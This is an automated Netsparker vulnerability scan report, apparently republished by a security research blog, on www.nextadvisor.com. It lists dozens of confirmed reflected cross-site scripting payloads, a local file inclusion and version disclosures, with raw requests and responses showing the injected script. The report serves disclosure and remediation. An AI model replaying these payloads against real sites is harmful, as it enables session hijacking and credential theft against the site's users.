XSS, Cross Site Scripting in www.nextadvisor.com, CWE-79, CWE-23, Directory traversal, Local File Inclusion, LFI, CAPEC-86, DORK, GHDB REPORT SUMMARY

Hoyt LLC Research investigates and reports on security vulnerabilities embedded in Web Applications and Products used in wide-scale deployment.

XSS.CX Home | XSS.CX Research Blog

Loading

Netsparker - Scan Report Summary
TARGET URL
http://www.nextadvisor.com/link.php?kw=gid9a%...
SCAN DATE
4/23/2011 10:48:42 PM
REPORT DATE
4/23/2011 11:16:23 PM
SCAN DURATION
00:26:53

Total Requests

5975

Average Speed

3.70 req/sec.
67
identified
55
confirmed
0
critical
7
informational

GHDB, DORK Tests

GHDB, DORK Tests
PROFILE
Previous Settings
ENABLED ENGINES
Static Tests, Find Backup Files, Blind Command Injection, Blind SQL Injection, Boolean SQL Injection, Command Injection, HTTP Header Injection, Local File Inclusion, Open Redirection, Remote Code Evaluation, Remote File Inclusion, SQL Injection, Cross-site Scripting
Authentication
Scheduled

VULNERABILITIES

Vulnerabilities
Netsparker - Web Application Security Scanner
IMPORTANT
79 %
LOW
10 %
INFORMATION
10 %

VULNERABILITY SUMMARY

Vulnerability Summary
URL Parameter Method Vulnerability Confirmed
/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000B8)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/aboutus.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0003B9)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/affiliate_program.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0003FA)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/audiobooks/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000177)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000177)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/audiobooks/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000178)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000178)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/auto_insurance/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000198)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000198)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/auto_insurance/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00019A)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00019A)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/blog'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00058A)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/contactus.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0003DA)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/credit_cards/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001B0)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001B0)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/credit_cards/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001BC)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001BC)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/credit_report_monitoring/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00039A)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00039A)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/diet_services/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001D1)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001D1)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/diet_services/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001DE)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001DE)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/genealogy/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000222)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000222)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/genealogy/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00021D)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00021D)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/identity_theft_protection_services/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000238)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000238)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/identity_theft_protection_services/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000244)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000244)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/identity_theft_protection_services/protect_my_id_review.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000BD9)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/images/ Programming Error Message No
[Possible] Internal Path Leakage (*nix) No
/images/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000414)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/includes/ Forbidden Resource Yes
/includes/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00010D)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/includes/javascript.php script GET Local File Inclusion Yes
[Possible] Internal Path Leakage (*nix) No
/includes/javascript.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000144)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000147)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/internet_fax/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00025B)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00025B)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/internet_fax/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000266)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000266)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/internet_security_software/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000345)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000345)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/jsp-examples/index.html Default Tomcat Page Identified No
/link.php TRACE / TRACK Identified Yes
/link.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000C9)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/link.php~ Backup Source Code Found No
[Possible] Backup File Found No
E-mail Address Disclosure No
/link.php~'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000DA)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/online_backup_services/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000285)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000285)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/online_backup_services/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000288)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000288)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/online_college/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0002A7)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002A7)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/online_college/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0002AA)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002AA)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/online_dating/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0002CA)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002CA)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/online_dating/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0002CC)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002CC)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/online_dvd_rental_services/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0001FA)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0001FA)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/online_dvd_rental_services/index.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000200)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000200)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/online_meeting/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0002E9)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002E9)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/online_tax_preparation_services/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000356)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000356)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/parental_controls/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0002EE)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0002EE)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/payday_loans/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00030F)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00030F)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/payday_loans_tx/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0003BA)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0003BA)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/people_search/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000310)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000310)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/privacy.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0003DC)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/remote_desktop/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000327)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000327)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/robots.txt Robots.txt Identified Yes
/savings_accounts/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000332)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000332)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/search_results.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000598)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/sitemap.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0003FE)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/sitemap.xml Apache Version Disclosure No
PHP Version Disclosure No
OpenSSL Version Disclosure No
Apache Module Version Disclosure No
Sitemap Identified No
/style-wide.css'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000426)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/virtual_phone/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000368)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000368)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/voip_services/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000376)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000376)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
/web_hosting/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000387)%3C/script%3E.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x000387)%3C/script%3E URI-BASED Raw URI Cross-site Scripting Yes
Cross-site Scripting

Cross-site Scripting

51 TOTAL
IMPORTANT
CONFIRMED
51
XSS (Cross-site Scripting) allows an attacker to execute a dynamic script (Javascript, VbScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/Javascript/VbScript by the browser.

XSS targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' session, an attacker might attack an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically the output location is HTML. Where the output is HTML ensure that all active content is removed prior to its presentation to the server.

Prior to sanitizing user input, ensure you have a pre-defined list of both expected and acceptable characters with which you populate a white-list. This list needs only be defined once and should be used to sanitize and validate all subsequent input.

There are a number of pre-defined, well structured white-list libraries available for many different environments, good examples of these include, OWASP Reform and Microsoft Anti Cross-site Scripting libraries are good examples.

Remedy References

External References

- /'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000B8)%3C/script%3E

/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000B8)%3C/script%3E CONFIRMED

http://www.nextadvisor.com/'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000B8)%3C/script%3E

Parameters

Parameter Type Value
URI-BASED Raw URI '"--></style></script><script>alert(0x0000B8)</script>

Request

GET /'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0000B8)%3C/script%3E HTTP/1.1
Referer: http://www.nextadvisor.com/link.php?kw=gid9a%20identity%20theft%20resource_ordering34&category=identitytheft&link=idtheftshield&id=227
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nextadvisor.com
Cookie: PHPSESSID=17a69ca9583e0628dce18d23efe8c700
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 03:55:15 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 3524
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><link rel="shortcut icon" href="http://www.nextadvisor.com/images/favicon.ico" /><title>Online Reviews</title><meta name="description" content="Compare services at NextAdvisor.com to help you choose the best service for your needs."/><meta name="keywords" content="NextAdvisor, NextAdvisor.com, Next Advisor, NextAdviser, Next Adviser, ConsumerCompare, ConsumerCompare.org, voip, credit reports, identity theft, online education, dvd rental, diet, internet phone service, credit scores, id theft, online schools, movie rental, online diet programs, Vonage, Voip.com, Equifax, CreditCheck Total, FreeCreditreport.com, Identity Guard, LifeLock, TrustedID, LoudSiren, PrivacyMatters, University of Phoenix, Capella University, AIU, eDiets, South Beach Diet, Blockbuster, Netflix, Cinemanow" /><link href="/style-wide.css" type="text/css" rel="stylesheet" /><link rel="canonical" href="http://www.nextadvisor.com/'"--></style></script><script>netsparker(0x0000B8)</script>" /><META name="y_key" content="c9a79123df10579a" /><meta name="msvalidate.01" content="7764DB09B9B7538FA422136D9D3745C1" /><meta name="msvalidate.01" content="60BB3E34FE2D428583F7C150AF730E34" /><meta name="msvalidate.01" content="B41084B242E240B28A144148F5AE6EB2" /><meta name="netinsert" content="0.0.1.12.14.1" /><script type="text/javascript" src="/includes/javascript.php?script=jquery.js"></script><script type="text/javascript" src="/includes/javascript.php?script=animatedcollapse.js"></script><script type="text/javascript">//googlefunction recordOutboundLink(link, category, action) { try { var pageTracker=_gat._getTracker("UA-246595-2"); pageTracker._trackEvent(category, action); setTimeout('document.location = "' + link.href + '"', 100) }catch(err){}}</script></head><body><!--Start Container--><div id="container"> <!--Start Header--> <div id="top_content"> <div id="header"> <div id="logo_name"> <a href="/index.php"><img src="/images/nextadvisor1.gif" alt="NextAdvisor.com Logo" width="238" height="42" /></a> </div> <!-- /logo_name --> <p class="toptext">The trusted, independent source for comparing the most valuable new services.</p> </div> <!-- /header --> <!--Start Content Container--> <!--Start Navigation--> <div id="navigation"> <div class="nav_left_bg"> <div class="nav_right_bg"> <div class="otherserv"> <script type="text/javascript"> function surfto(form) { var myindex=form.select1.selectedIndex if (form.select1.options[myindex].value != 0) { location=form.select1.options[myindex].value;} } </script> <form name="form1"> <select name="select1" onChange="surfto(this.form)" size=1> <option value="0" selected>-- All Services -- </option> <option value="/audiobooks/index.php">Audiobooks</option> <option value="/auto_insurance/index.php">Auto Insurance</option> <option value="/credit_cards/index.php">Credit Cards</option> <option value="/credit_report_monitoring/">Credit Monitoring</option> <option value="/diet_services/index.php">Diet Programs</option> <option value="/online_dvd_rental_services/index.php">DVD Rental</option> <option value="/genealogy/index.php">Genealogy</option> <option value="/identity_theft_protection_services/index.php">Identity Theft</option> <option value="/internet_fax/index.php">Internet Fax</option> <option value="/online_backup_services/index.php">Online Backup</option> <option value="/online_college/index.php">Online College</option> <option value="/online_dating/index.php">Online Dating</option> <option value="/online_meeting/index.php">Online Meeting</option> <option value="/parental_controls/index.php">Parental Controls</option> <option value="/payday_loans/index.php">Payday Loans</option> <option value="/people_search/index.php">People Search</option> <option value="/remote_desktop/index.php">Remote Desktop</option> <option value="/savings_accounts/index.php">Savings Accounts</option> <option value="/internet_security_software/index.php">Security Software</option> <option value="/online_tax_preparation_services/index.php">Tax Preparation</option> <option value="/virtual_phone/index.php">Virtual Phone</option> <option value="/voip_services/index.php">VoIP Services</option> <option value="/web_hosting/index.php">Web Hosting</option> </select> </form> </div> <ul> <li><a href="/index.php" class="nav_home">Home</a></li> <li><a href="/voip_services/index.php" > VoIP<br/>Services </a></li> <li><a href="/credit_report_monitoring/index.php" > Credit<br/>Monitoring </a></li> <li><a href="/identity_theft_protection_services/index.php" > Identity<br/>Theft </a></li> <li><a href="/web_hosting/index.php" > Web<br/>Hosting </a></li> <li><a href="/diet_services/index.php" > Diet<br/>Programs </a></li> <li><a href="/online_college/index.php" > Online<br/>College </a></li> <li><a href="/internet_security_software/index.php" > Security<br/>Software </a></li> <li><a href="/online_backup_services/index.php" > Online<br/>Backup </a></li> <li><a href='/script><script>netsparker(0x0000B8)</index.php' class='nav_select'></a></li> </ul> <br style="clear:both" /> </div> </div> </div></div> <div id="content_container"> <!--End Navigation--> <!--End Header--> <!--Start Sub Navigation--><div class="sub_nav"><p> <a href="aboutus.php">About Us</a> <span class="nav_border">|</span> <a href="management.php">Management</a> <span class="nav_border">|</span> <a href="pressroom.php">Press</a><span class="nav_border">|</span><a href="/affiliate_program.php">Affiliate Program</a><div> <form action="http://www.nextadvisor.com/search_results.php" id="cse-search-box"> <label for="q"> Search NextAdvisor.com<br/><input type="text" name="q" size="18" /> <input type="submit" name="sa" value="Search" style="width:auto;" /> <input type="hidden" name="cx" value="010808658558223622043:td9kdqti1km" /> <input type="hidden" name="cof" value="FORID:11;NB:1" /> <input type="hidden" name="ie" value="UTF-8" /></form></p></div><script type="text/javascript" src="http://www.google.com/coop/cse/brand?form=cse-search-box&lang=en"></script> </p></div> <!--End Sub Navigation--> <div id="content" > <h1 style="padding-top:12px;">File Not Found</h1> <p class="welcome"> We're sorry, the file you requested could not be found. </p> <div style="clear:both" ></div> <!--Start Footer--> <div id="footer"></div> <div class="footer_content"> <div class="footer_left"> <h3>All Services Reviewed:</h3> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td><p> <a href="/audiobooks/">Audio Books</a><br /> <a href="/auto_insurance/">Auto Insurance</a><br /> <a href="/credit_cards/">Credit Cards</a><br /> <a href="/credit_report_monitoring/">Credit Monitoring</a><br /> <a href="/diet_services/">Diet Programs</a><br /> <a href="/online_dvd_rental_services/">DVD Rental</a></p></td> <td><p> <a href="/genealogy/">Genealogy</a><br /> <a href="/identity_theft_protection_services/">Identity Theft</a><br /> <a href="/internet_fax/">Internet Fax</a><br /> <a href="/online_backup_services/">Online Backup</a><br /> <a href="/online_college/">Online College</a><br/> <a href="/online_dating/">Online Dating</a></p></td> <td><p> <a href="/online_meeting/">Online Meeting</a><br /> <a href="/parental_controls/">Parental Controls</a><br /> <a href="/payday_loans/">Payday Loans</a><br /> <a href="/people_search/">People Search</a><br /> <a href="/remote_desktop/">Remote Desktop</a><br /> <a href="/savings_accounts/">Savings Accounts</a> </p></td> <td><p> <a href="/internet_security_software/">Security Software</a><br /> <a href="/online_tax_preparation_services/">Tax Preparation</a><br /> <a href="/virtual_phone/">Virtual Phone</a><br /> <a href="/voip_services/">VoIP Services</a><br /> <a href="/web_hosting/">Web Hosting</a></p></td> </tr></table> </div> <div class="footer_right"><h3>Popular Services Reviewed:</h3> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td><p><a href="/credit_report_monitoring/">Credit Monitoring Services</a><br /> <a href="/identity_theft_protection_services/">Identity Theft Services</a><br /> <a href="/web_hosting/">Web Hosting Services</a></p></td> <td><p><a href="/online_dating/">Online Dating Services</a><br /> <a href="/diet_services/">Online Diet Programs</a><br /> <a href="/voip_services/">VoIP Services</a></p></td> </tr> </table><div class="next_latest"><p><a href="/">NextAdvisor Home</a> <span>|</span><a href="/blog/">Latest Blog Headlines</a></p></div> </div> <br style="clear:both" /> </div> <!--End Footer Category--> <!--Start Bottom--> <div id="bottom"> <div id="logo_sml"> <div style="float:left;"><a href="/"><img src="/images/nextadvisor1_sml.gif" alt="" width="116" height="15" /></a><span class="bottomlink"><a href="/aboutus.php">About Us</a></span><span class="bottomlink"><a href="/blog">Blog</a></span><span class="bottomlink"><a href="/contactus.php">Contact Us</a></span><span class="bottomlink"><a href="/privacy.php">Terms &amp; Privacy Policy</a></span><span class="bottomlink"><a href="/affiliate_program.php">Affiliate Program</a></span><span class="bottomlink"><a href="/sitemap.php">Site Map</a></span><span class="bottomlink"><a href="http://twitter.com/nextadvisor" target="_blank">Follow Us On Twitter</a></span></div><div style="margin:3px 0 0 0; float:left"><a href="http://twitter.com/nextadvisor" target="_blank" style="text-decoration:none;"><img src="/images/twitter.gif" /></a></div><br style="clear:both"/> <!--End Bottom--> <p class="copyright">Copyright&#169; 2006 - 2011 NextAdvisor.com - All rights reserved.</p> </div> <!-- /logo_sml --> </div> <!-- /bottom --> <!--End Footer--> </div> <!--End Content--> <br style="clear:both" /> </div><!--End Content Container--></div><!--End Container--><script type="text/javascript">var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type="text/javascript">try {var pageTracker = _gat._getTracker("UA-246595-2");pageTracker._trackPageview();} catch(err) {}</script></body></html>
- /link.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000C9)%3C/script%3E

/link.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000C9)%3C/script%3E CONFIRMED

http://www.nextadvisor.com/link.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0000C9)%3C/..

Parameters

Parameter Type Value
kw GET gid9a identity theft resource_ordering34
category GET identitytheft
link GET idtheftshield
id GET 227
URI-BASED Raw URI '"--></style></script><script>alert(0x0000C9)</script>

Request

GET /link.php'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x0000C9)%3C/script%3E HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.nextadvisor.com
Cookie: PHPSESSID=17a69ca9583e0628dce18d23efe8c700
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 03:55:55 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.7e PHP/5.3.2 mod_jk/1.2.21
X-Powered-By: PHP/5.3.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 3524
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><link rel="shortcut icon" href="http://www.nextadvisor.com/images/favicon.ico" /><title>Online Reviews</title><meta name="description" content="Compare services at NextAdvisor.com to help you choose the best service for your needs."/><meta name="keywords" content="NextAdvisor, NextAdvisor.com, Next Advisor, NextAdviser, Next Adviser, ConsumerCompare, ConsumerCompare.org, voip, credit reports, identity theft, online education, dvd rental, diet, internet phone service, credit scores, id theft, online schools, movie rental, online diet programs, Vonage, Voip.com, Equifax, CreditCheck Total, FreeCreditreport.com, Identity Guard, LifeLock, TrustedID, LoudSiren, PrivacyMatters, University of Phoenix, Capella University, AIU, eDiets, South Beach Diet, Blockbuster, Netflix, Cinemanow" /><link href="/style-wide.css" type="text/css" rel="stylesheet" /><link rel="canonical" href="http://www.nextadvisor.com/link.php'"--></style></script><script>netsparker(0x0000C9)</script>" /><META name="y_key" content="c9a79123df10579a" /><meta name="msvalidate.01" content="7764DB09B9B7538FA422136D9D3745C1" /><meta name="msvalidate.01" content="60BB3E34FE2D428583F7C150AF730E34" /><meta name="msvalidate.01" content="B41084B242E240B28A144148F5AE6EB2" /><meta name="netinsert" content="0.0.1.12.14.1" /><script type="text/javascript" src="/includes/javascript.php?script=jquery.js"></script><script type="text/javascript" src="/includes/javascript.php?script=animatedcollapse.js"></script><script type="text/javascript">//googlefunction recordOutboundLink(link, category, action) { try { var pageTracker=_gat._getTracker("UA-246595-2"); pageTracker._trackEvent(category, action); setTimeout('document.location = "' + link.href + '"', 100) }catch(err){}}</script></head><body><!--Start Container--><div id="container"> <!--Start Header--> <div id="top_content"> <div id="header"> <div id="logo_name"> <a href="/index.php"><img src="/images/nextadvisor1.gif" alt="NextAdvisor.com Logo" width="238" height="42" /></a> </div> <!-- /logo_name --> <p class="toptext">The trusted, independent source for comparing the most valuable new services.</p> </div> <!-- /header --> <!--Start Content Container--> <!--Start Navigation--> <div id="navigation"> <div class="nav_left_bg"> <div class="nav_right_bg"> <div class="otherserv"> <script type="text/javascript"> function surfto(form) { var myindex=form.select1.selectedIndex if (form.select1.options[myindex].value != 0) { location=form.select1.options[myindex].value;} } </script> <form name="form1"> <select name="select1" onChange="surfto(this.form)" size=1> <option value="0" selected>-- All Services -- </option> <option value="/audiobooks/index.php">Audiobooks</option> <option value="/auto_insurance/index.php">Auto Insurance</option> <option value="/credit_cards/index.php">Credit Cards</option> <option value="/credit_report_monitoring/">Credit Monitoring</option> <option value="/diet_services/index.php">Diet Programs</option> <option value="/online_dvd_rental_services/index.php">DVD Rental</option> <option value="/genealogy/index.php">Genealogy</option> <option value="/identity_theft_protection_services/index.php">Identity Theft</option> <option value="/internet_fax/index.php">Internet Fax</option> <option value="/online_backup_services/index.php">Online Backup</option> <option value="/online_college/index.php">Online College</option> <option value="/online_dating/index.php">Online Dating</option> <option value="/online_meeting/index.php">Online Meeting</option> <option value="/parental_controls/index.php">Parental 